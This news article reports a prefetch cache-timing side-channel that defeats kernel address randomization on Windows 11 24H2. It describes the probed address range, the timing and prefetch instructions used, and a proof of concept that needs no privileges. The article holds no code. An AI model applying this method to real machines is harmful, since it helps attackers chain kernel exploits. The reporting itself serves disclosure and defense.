A newly demonstrated side-channel attack has shown that Kernel Address Space Layout Randomization (kASLR) in Windows 11, including the latest 24H2 release, can be defeated using advanced cache timing techniques.
The vulnerability centers on leveraging microarchitectural features-specifically speculative execution and CPU cache behavior-to infer the memory base address of ntoskrnl.exe, circumventing conventional kASLR-based mitigation strategies.
Erosion of Traditional kASLR Bypass Methods
Historically, attackers and researchers have relied on Windows APIs such as NtQuerySystemInformation() to retrieve kernel image locations, but Microsoft’s recent changes in Windows 11 24H2 have closed this loophole, restricting the ability to query system module addresses without elevated privileges.
However, a new technical approach-disclosed by exploits-forsale and explained in recent technical reporting-demonstrates that even these defensive changes are insufficient when microarchitectural side-channels are employed.
Modern processors optimize performance using features like speculative execution, which predicts and executes likely instruction paths, and multi-level cache hierarchies that store frequently accessed data closer to the CPU.
While these features enhance speed, they also expose subtle timing variations that attackers can measure to glean protected information.
The Prefetch Side-Channel technique exploits this by systematically probing a range of possible kernel base addresses-between 0xfffff80000000000 and 0xfffff80800000000 (aligned to 0x100000, yielding 0x8000 candidates).
The attacker repeatedly accesses each candidate address, using a custom assembly routine that integrates precise timing instructions (rdtscp, mfence, lfence) and cache manipulation instructions like prefetchnta and prefetcht2.
By measuring the access latency for each address, the attack identifies those cached by the CPU-a clear signal that the memory is mapped to an active system module, in this case, ntoskrnl.exe.
Lower access times indicate addresses that are most recently or frequently accessed by the kernel.
Attack Implementation
The proof of concept includes a well-documented C and assembly hybrid. The attack routine, named sideChannel, flushes and reloads candidate addresses, measuring the elapsed CPU cycles before and after cache prefetches.
These timings are aggregated across multiple iterations to filter noise and outliers.
The program then analyzes the timing statistical distribution, searching for consistent clusters of minimal-latency accesses-which strongly correlate to the actual loaded base of ntoskrnl.exe.
This method does not require SeDebugPrivilege, admin rights, or API calls restricted by Windows security settings.
Notably, the attack operates reliably on bare-metal systems with Intel CPUs, though virtualization environments (such as VMware with SLAT) may interfere due to altered caching mechanisms.
According to the Report, The successful bypass of kASLR via this microarchitectural attack underlines the persistent risks presented by speculative execution and side-channel vulnerabilities, issues that have troubled the hardware industry since Spectre and Meltdown.
While Intel and other vendors have rolled out mitigations at both firmware and OS levels, cache timing attacks remain challenging to completely eradicate without significant performance trade-offs.
For defenders, this research highlights the necessity of hardware-software co-design and the limits of software-only address randomization for kernel protection.
It also calls for ongoing scrutiny of microarchitectural behavior and for robust monitoring of abnormal timing patterns that could signal exploitation attempts.
In summary, the Prefetch Side-Channel attack demonstrates that kASLR, when faced with determined adversaries armed with knowledge of CPU internals, cannot be considered a silver bullet for kernel memory disclosure prevention on modern Windows platforms.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
